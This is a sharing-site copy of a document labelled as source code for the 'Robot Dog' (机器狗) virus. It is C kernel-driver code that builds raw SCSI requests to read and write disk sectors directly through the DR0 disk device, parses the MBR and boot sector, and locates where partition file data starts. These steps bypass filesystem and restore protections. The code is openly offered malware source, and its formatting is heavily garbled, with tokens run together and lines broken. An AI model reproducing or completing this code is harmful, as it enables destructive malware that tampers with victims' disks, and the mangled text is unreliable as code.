机器狗病毒源码1C语言文档格式.docx
- 文档编号:17194402
- 上传时间:2022-11-28
- 格式:DOCX
- 页数:17
- 大小:19.88KB
机器狗病毒源码1C语言文档格式.docx
《机器狗病毒源码1C语言文档格式.docx》由会员分享,可在线阅读,更多相关《机器狗病毒源码1C语言文档格式.docx(17页珍藏版)》请在冰豆网上搜索。
{
UCHARactive;
UCHARStartHead;
UCHARStartSector;
UCHARStartCylinder;
UCHARPartitionType;
UCHAREndHead;
UCHAREndSector;
UCHAREndCylinder;
ULONGStartLBA;
ULONGTotalSector;
}PARTITION_ENTRY,*PPARTITION_ENTRY;
typedefstruct_MBR_SECTOR
UCHARBootCode[446];
PARTITION_ENTRYPartition[4];
USHORTSignature;
}MBR_SECTOR,*PMBR_SECTOR;
typedefstruct_BBR_SECTOR
USHORTJmpCode;
UCHARNopCode;
UCHAROEMName[8];
USHORTBytesPerSector;
UCHARSectorsPerCluster;
USHORTReservedSectors;
UCHARNumberOfFATs;
USHORTRootEntries;
USHORTNumberOfSectors16;
UCHARMediaDescriptor;
USHORTSectorsPerFAT16;
USHORTSectorsPerTrack;
USHORTHeadsPerCylinder;
ULONGHiddenSectors;
ULONGNumberOfSectors32;
ULONGSectorsPerFAT32;
}BBR_SECTOR,*PBBR_SECTOR;
#pragmapack()
typedefstruct_SYSTEM_MODULE_INFORMATION{
ULONGReserved[2];
PVOIDBase;
ULONGSize;
ULONGFlags;
USHORTIndex;
USHORTUnknown;
USHORTLoadCount;
USHORTModuleNameOffset;
CHARImageName[255];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
INPUNICODE_STRINGObjectName,
INULONGAttributes,
INPACCESS_STATEAccessStateOPTIONAL,
INACCESS_MASKDesiredAccessOPTIONAL,
INPOBJECT_TYPEObjectType,
INKPROCESSOR_MODEAccessMode,
INOUTPVOIDParseContextOPTIONAL,
OUTPVOID*Object);
ZwQuerySystemInformation(
INULONGSystemInformationClass,
INOUTPVOIDSystemInformation,
INULONGSystemInformationLength,
OUTPULONGReturnLength);
IrpCompletionRoutine(
INPDEVICE_OBJECTDeviceObject,
INPIRPIrp,
INPVOIDContext
){
PMDLmdl;
Irp->
UserIosb->
Status=Irp->
IoStatus.Status;
Information=Irp->
IoStatus.Information;
if(!
Context)
{
mdl=Irp->
MdlAddress;
if(mdl){
DbgPrint("
readsize:
%d.."
Irp->
IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}}
KeSetEvent(Irp->
UserEvent,IO_NO_INCREMENT,0);
IoFreeIrp(Irp);
returnSTATUS_MORE_PROCESSING_REQUIRED;
}
NTSTATUSIrpCompletionRoutine_0(
if(!
Context)
if(mdl)
}
returnSTATUS_MORE_PROCESSING_REQUIRED;
ULONGGetModuleBase(char*name){
ULONGn,i;
PSYSTEM_MODULE_INFORMATIONmodule;
PVOIDpbuftmp;
charmodulename[255];
ZwQuerySystemInformation(11,&
n,0,&
n);
pbuftmp=ExAllocatePool(NonPagedPool,n);
ZwQuerySystemInformation(11,pbuftmp,n,NULL);
module=(PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp+1);
n=*((PULONG)pbuftmp);
for(i=0;
i<
n;
i++)
strcpy(modulename,module.ImageName+module.ModuleNameOffset);
_strnicmp(modulename,name,strlen(name))){
ExFreePool(pbuftmp);
return(ULONG)module.Base;
ExFreePool(pbuftmp);
return0;
NTSTATUSMyIoCallDriver(PDEVICE_OBJECTDeviceObject,PIRPIrp)//自己的IoCallDriver
PIO_STACK_LOCATIONstack;
--Irp->
CurrentLocation;
stack=IoGetNextIrpStackLocation(Irp);
Tail.Overlay.CurrentStackLocation=stack;
//移动堆栈
stack->
DeviceObject=DeviceObject;
return(DeviceObject->
DriverObject->
MajorFunction[(ULONG)stack->
MajorFunction])(DeviceObject,Irp);
ULONGAtapiReadWriteDisk(PDEVICE_OBJECTdev_object,ULONGMajorFunction,PVOIDbuffer,ULONGDiskPos,intBlockCount)
NTSTATUSstatus;
PSCSI_REQUEST_BLOCKsrb;
PSENSE_DATAsense;
KEVENTEvent;
PIRPirp;
IO_STATUS_BLOCKisb;
PIO_STACK_LOCATIONisl;
PVOIDpsense;
intcount=8;
while
(1){
srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK));
srb)
break;
sense=ExAllocatePool(0,sizeof(SENSE_DATA));
psense=sense;
sense)
memset(srb,0,sizeof(SCSI_REQUEST_BLOCK));
memset(sense,0,sizeof(SENSE_DATA));
srb->
Length=sizeof(SCSI_REQUEST_BLOCK);
//更多关于srb,请看《SCSI总线和IDE接口:
协议、应用和编程》和《SCSI程序员指南》
Function=0;
DataBuffer=buffer;
DataTransferLength=BlockCount<
<
9;
//sectorsize*numberofsector
QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;
SrbStatus=0;
ScsiStatus=0;
NextSrb=0;
SenseInfoBuffer=sense;
SenseInfoBufferLength=sizeof(SENSE_DATA);
if(MajorFunction==IRP_MJ_READ)
SrbFlags=SRB_FLAGS_DATA_IN;
else
SrbFlags=SRB_FLAGS_DATA_OUT;
SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE;
SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE;
TimeOutValue=(srb->
DataTransferLength>
>
10)+1;
QueueSortKey=DiskPos;
CdbLength=10;
Cdb[0]=2*((UCHAR)MajorFunction+17);
Cdb[1]=srb->
Cdb[1]&
0x1F|0x80;
Cdb[2]=(unsignedchar)(DiskPos>
0x18)&
0xFF;
//
Cdb[3]=(unsignedchar)(DiskPos>
0x10)&
Cdb[4]=(unsignedchar)(DiskPos>
0x08)&
Cdb[5]=(UCHAR)DiskPos;
//填写sector位置
Cdb[7]=(UCHAR)BlockCount>
0x08;
Cdb[8]=(UCHAR)BlockCount;
//By:
Eros412
KeInitializeEvent(&
Event,0,0);
irp=IoAllocateIrp(dev_object->
StackSize,0);
mdl=IoAllocateMdl(buffer,BlockCount<
9,0,0,irp);
irp->
MdlAddress=mdl;
mdl){
ExFreePool(srb);
ExFreePool(psense);
IoFreeIrp(irp);
returnSTATUS_INSUFFICIENT_RESOURCES;
MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ?
0:
1));
OriginalRequest=irp;
UserIosb=&
isb;
UserEvent=&
Event;
IoStatus.Status=0;
IoStatus.Information=0;
Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;
AssociatedIrp.SystemBuffer=0;
Cancel=0;
RequestorMode=0;
CancelRoutine=0;
Tail.Overlay.Thread=PsGetCurrentThread();
isl=IoGetNextIrpStackLocation(irp);
isl->
DeviceObject=dev_object;
MajorFunction=IRP_MJ_SCSI;
Parameters.Scsi.Srb=srb;
CompletionRoutine=IrpCompletionRoutine_0;
Context=srb;
Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR;
status=MyIoCallDriver(dev_object,irp);
KeWaitForSingleObject(&
Event,0,0,0,0);
if(srb->
SenseInfoBuffer!
=psense&
&
srb->
SenseInfoBuffer)
ExFreePool(srb->
SenseInfoBuffer);
if(status>
=0||!
count)
returnstatus;
SendXXXFailed..%08x\r\n"
status);
KeStallExecutionProcessor(1u);
--count;
returnSTATUS_INSUFFICIENT_RESOURCES;
PDEVICE_OBJECTGetLastDiskDeviceObject(PDRIVER_OBJECTdrv_object)//这个就是DR0
PDEVICE_OBJECTresult;
PDEVICE_OBJECTfinddev;
finddev=drv_object->
DeviceObject;
result=NULL;
while(finddev)
if(finddev->
DeviceType==FILE_DEVICE_DISK)
result=finddev;
finddev=finddev->
NextDevice;
returnresult;
PDEVICE_OBJECTGetAtaDr0DevObject(){
UNICODE_STRINGdiskstr;
PDRIVER_OBJECTdiskdrv;
PDEVICE_OBJECTdr0dev;
RtlInitUnicodeString(&
diskstr,L"
\\Driver\\Disk"
);
if(ObReferenceObjectByName(&
diskstr,64,0,0,*IoDriverObjectType,0,0,&
diskdrv)<
0)
returnNULL;
dr0dev=GetLastDiskDeviceObject(diskdrv);
if(dr0dev)
DbgPrint("
Eros412said:
atadr0devobjis:
%08x..."
dr0dev);
ObfDereferenceObject(diskdrv);
returndr0dev;
PDEVICE_OBJECTGetFileObjectDevice(PFILE_OBJECTObject){
PDEVICE_OBJECTresult=NULL;
PVPBvpb;
vpb=Object->
Vpb;
result=vpb->
vpb||!
result)
Object->
DeviceObject->
Vpb||!
Vpb->
DeviceObject)
result=Object->
returnresult;
PLARGE_INTEGERGetPosAndCluster()//得到第一个分区文件数据的起始位置
PVOIDbuffer;
ULONGtype,startlba;
inti;
PLARGE_INTEGERresult;
PDEVICE_OBJECTdev;
PMBR_SECTORmbrsec;
PPARTITION_ENTRYpartition0;
PBBR_SECTORbootsec;
result=ExAllocatePool(0,sizeof(LARGE_INTEGER));
dev=GetAtaDr0DevObject();
if(dev){
buffer=ExAllocatePool(0,512);
memset(buffer,0,512);
if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,0,1)>
AtapiReadWriteDiskok"
mbrsec=(PMBR_SECTOR)buffer;
partition0=&
mbrsec->
Partition[0];
startlba=partition0[0].StartLBA;
type=partition0[0].PartitionType;
dwPartOnePos:
0x%08x..1"
startlba);
result->
QuadPart=startlba;
if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,startlba,1)>
0){
bootsec=(PBBR_SECTOR)buffer;
gSectorsPerCluster:
%d..."
bootsec->
SectorsPerCluster);
sectorspercluster=bootsec->
SectorsPerCluster;
QuadPart+=bootsec->
ReservedSectors;
%I64x..2\r\n"
result->
QuadPart);
if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA)
NumberOfFATs*bootsec->
SectorsPerFA
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 机器 病毒 源码 语言
![提示](https://static.bdocx.com/images/bang_tan.gif)